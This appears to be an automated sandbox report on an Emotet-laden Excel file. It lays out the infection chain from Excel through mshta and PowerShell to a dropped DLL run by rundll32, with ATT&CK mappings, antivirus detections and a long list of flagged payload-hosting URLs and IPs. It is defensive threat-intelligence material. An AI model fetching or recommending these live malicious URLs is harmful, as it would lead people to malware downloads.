                            Source: Yara matchFile source: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493927485.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673263211.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673700095.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673435114.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538786600.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538736284.0000000002F91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538591662.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672103586.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538065858.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672388917.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673628550.0000000003691000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494040925.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538366137.0000000000900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\Public\Documents\ssd.dll, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium3
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts111
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory13
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		Exfiltration Over Bluetooth11
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Email Collection                            		Automated Exfiltration2
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS1
                            Query Registry                            		Distributed Component Object Model1
                            Input Capture                            		Scheduled Transfer113
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script21
                            Masquerading                            		LSA Secrets21
                            Security Software Discovery                            		SSH1
                            Clipboard Data                            		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Modify Registry                            		Cached Domain Credentials2
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items2
                            Virtualization/Sandbox Evasion                            		DCSync2
                            Process Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                            Process Injection                            		Proc Filesystem1
                            Application Window Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Hidden Files and Directories                            		/etc/passwd and /etc/shadow1
                            Remote System Discovery                            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                            Rundll32                            		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562396 Sample: imedpub.com_10.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 42 other IPs or domains 2->53 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Multi AV Scanner detection for domain / URL 2->63 65 Found malware configuration 2->65 67 17 other signatures 2->67 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\imedpub.com_10.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.168, 49165, 49166, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 16 7 20->23         started        process9 dnsIp10 57 www.yeald.finance 94.130.116.76, 443, 49167 HETZNER-ASDE Germany 23->57 45 C:\Users\Public\Documents\ssd.dll, PE32 23->45 dropped 71 Powershell drops PE file 23->71 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 2 30->32         started        file16 43 C:\Windows\...\jxnctwsmnhcex.tox (copy), PE32 32->43 dropped 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->59 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->69 41 rundll32.exe 38->41         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            imedpub.com_10.xls30%ReversingLabsDocument-Excel.Trojan.Emotet

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\Public\Documents\ssd.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            15.2.rundll32.exe.2f90000.25.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2b60000.13.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.a20000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.9c0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2f50000.24.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.bf0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.22b0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2790000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2820000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2aa0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.7e0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.9f0000.5.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2f20000.23.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2dc0000.20.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.270000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.25c0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.23a0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.3d0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2d80000.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2730000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.300000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2370000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2b90000.14.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.24f0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2760000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.3690000.29.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2340000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.3660000.28.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2d50000.18.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2f90000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.910000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2410000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2f10000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2c60000.15.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.c20000.9.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.870000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2e90000.12.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.900000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2d20000.17.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2eb0000.22.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.790000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2ad0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.330000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            9.2.rundll32.exe.760000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2880000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.bf0000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2ff0000.27.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2e40000.21.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.cf0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.350000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2fc0000.26.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2850000.11.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.bc0000.7.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.25f0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.c60000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2cf0000.16.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.bc0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.220000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                            Domains

                            SourceDetectionScannerLabelLink
                            www.yeald.finance9%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            https://www.yeald.finance/wp-adm100%Avira URL Cloudmalware
                            https://palankhir.hu/tools/GJRNh100%Avira URL Cloudmalware
                            http://ocsp.entrust.net030%URL Reputationsafe
                            https://palankhir.hu/tools/GJRNhZHz/12%VirustotalBrowse
                            https://palankhir.hu/tools/GJRNhZHz/100%Avira URL Cloudmalware
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                            http://tattooblog.cn/wp-includes/KJLv/PE3100%Avira URL Cloudmalware
                            https://weddingbandsirelandjbk.com/hgsynt2/o/100%Avira URL Cloudmalware
                            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                            https://umanostudio.com/wp-admin100%Avira URL Cloudmalware
                            http://tattooblog.cn/wp-includes/KJLv/100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            http://masboni.com/wp-admin/3zUQl/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe.htmlo100%Avira URL Cloudmalware
                            https://falah.or0%Avira URL Cloudsafe
                            http://91.240.118.168/zzx/ccv/fe.htmlfunction100%Avira URL Cloudmalware
                            http://starspeedng.com/One-File/100%Avira URL Cloudmalware
                            http://starspeedng.com/One-File/U3Trml/100%Avira URL Cloudphishing
                            https://160.16.102.168:80/Tep0%Avira URL Cloudsafe
                            https://getcode.info/wp-content/100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe.html6100%Avira URL Cloudmalware
                            http://www.protware.com/0%URL Reputationsafe
                            http://www.protware.com/A0%Avira URL Cloudsafe
                            https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/PE3100%Avira URL Cloudmalware
                            http://sneakadream.com/wp-conten100%Avira URL Cloudphishing
                            https://tanquessepticos.com/wp-a100%Avira URL Cloudmalware
                            http://sneakadream.com/wp-content/pccmAOq/100%Avira URL Cloudmalware
                            https://www.yeald.finance100%Avira URL Cloudmalware
                            https://www.yeald.finance/wp-admin/1WgPRm/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe.htmlB100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe.htmlhttp://91.240.118.168/zzx/ccv/fe.html100%Avira URL Cloudmalware
                            http://tattooblog.cn/wp-includes100%Avira URL Cloudmalware
                            http://masboni.c0%Avira URL Cloudsafe
                            https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/100%Avira URL Cloudmalware
                            https://www.yeald.finance/wp-admin/1WgPRm/100%Avira URL Cloudmalware
                            https://allaagency.ro/wp-admin/7100%Avira URL Cloudmalware
                            http://ocsp.entrust.net0D0%URL Reputationsafe
                            http://91.240.118.168/zzx/ccv/fe.html100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe.htmlWinSta0100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe.htmlC:100%Avira URL Cloudmalware
                            https://chochungcuhanoi.com/wp-c100%Avira URL Cloudmalware
                            https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/PE3100%Avira URL Cloudmalware
                            https://palankhir.hu/tools/GJRNhZHz/PE3100%Avira URL Cloudmalware
                            http://masboni.com/wp-admin/3zUQl/100%Avira URL Cloudmalware
                            https://falah.org.pk/vegasvulkan100%Avira URL Cloudphishing
                            https://weddingbandsirelandjbk.c0%Avira URL Cloudsafe
                            https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe100%Avira URL Cloudmalware
                            https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/100%Avira URL Cloudmalware
                            https://weddingbandsirelandjbk.com/hgsynt2/o/PE3100%Avira URL Cloudmalware
                            https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe.htmlmshta100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe.htmlsE100%Avira URL Cloudmalware
                            https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/PE3100%Avira URL Cloudmalware
                            http://sneakadream.com/wp-content/pccmAOq/PE3100%Avira URL Cloudmalware
                            https://160.16.102.168/0%Avira URL Cloudsafe
                            http://91.240.118.168/zzx/ccv/fe.pngPE3100%Avira URL Cloudmalware
                            http://www.protware.com0%URL Reputationsafe
                            https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/100%Avira URL Cloudmalware
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                            http://starspeedng.com/One-File/U3Trml/PE3100%Avira URL Cloudphishing
                            https://getcode.info/wp-content/QDx8b5j/100%Avira URL Cloudmalware
                            http://91.240.118.168100%URL Reputationmalware
                            https://160.16.102.168:80/Tepia0%Avira URL Cloudsafe
                            https://allaagency.ro/wp-admin/7/PE3100%Avira URL Cloudmalware
                            https://getcode.info/wp-content/QDx8b5j/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe.htmlv1.0YA100%Avira URL Cloudmalware
                            http://masboni.com/wp-admin/3zUQ100%Avira URL Cloudmalware
                            http://91.240.118.168/zzx/ccv/fe.png100%Avira URL Cloudmalware
                            https://allaagency.ro/wp-admin/7/100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            www.yeald.finance
                            		94.130.116.76
                            		truetrueunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://www.yeald.finance/wp-admin/1WgPRm/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.168/zzx/ccv/fe.htmltrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.168/zzx/ccv/fe.pngtrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.yeald.finance/wp-admpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://palankhir.hu/tools/GJRNhpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://ocsp.entrust.net03powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672271946.0000000000411000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://palankhir.hu/tools/GJRNhZHz/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • 12%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://tattooblog.cn/wp-includes/KJLv/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://weddingbandsirelandjbk.com/hgsynt2/o/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000006.00000002.677729797.000000001B468000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://umanostudio.com/wp-adminpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://tattooblog.cn/wp-includes/KJLv/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.11powershell.exe, 00000006.00000002.674371318.00000000035B1000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		low
                            http://masboni.com/wp-admin/3zUQl/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.168/zzx/ccv/fe.htmlomshta.exe, 00000004.00000002.433420430.0000000000496000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://falah.orpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.168/zzx/ccv/fe.htmlfunctionmshta.exe, 00000004.00000003.419183673.0000000002A6D000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://starspeedng.com/One-File/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://starspeedng.com/One-File/U3Trml/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            https://160.16.102.168:80/Teprundll32.exe, 0000000F.00000002.672163604.000000000039A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://getcode.info/wp-content/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.168/zzx/ccv/fe.html6mshta.exe, 00000004.00000002.433277955.000000000039E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.protware.com/mshta.exe, 00000004.00000002.433840296.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433713117.000000000312B000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418141010.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417223440.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432232024.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432985416.000000000321F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418629434.000000000321F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.protware.com/Amshta.exe, 00000004.00000003.417168851.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433813182.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432328982.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432086271.00000000031CC000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://sneakadream.com/wp-contenpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            https://tanquessepticos.com/wp-apowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://sneakadream.com/wp-content/pccmAOq/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://www.yeald.financepowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://www.yeald.finance/wp-admin/1WgPRm/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.168/zzx/ccv/fe.htmlBimedpub.com_10.xls.0.drtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.168/zzx/ccv/fe.htmlhttp://91.240.118.168/zzx/ccv/fe.htmlmshta.exe, 00000004.00000003.419030609.0000000002A65000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://tattooblog.cn/wp-includespowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://masboni.cpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://allaagency.ro/wp-admin/7powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.677744196.000000001B47F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://91.240.118.168/zzx/ccv/fe.htmlWinSta0mshta.exe, 00000004.00000002.433261610.0000000000360000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.168/zzx/ccv/fe.htmlC:mshta.exe, 00000004.00000002.433356985.0000000000419000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://chochungcuhanoi.com/wp-cpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://palankhir.hu/tools/GJRNhZHz/PE3powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://masboni.com/wp-admin/3zUQl/powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://falah.org.pk/vegasvulkanpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            https://weddingbandsirelandjbk.cpowershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
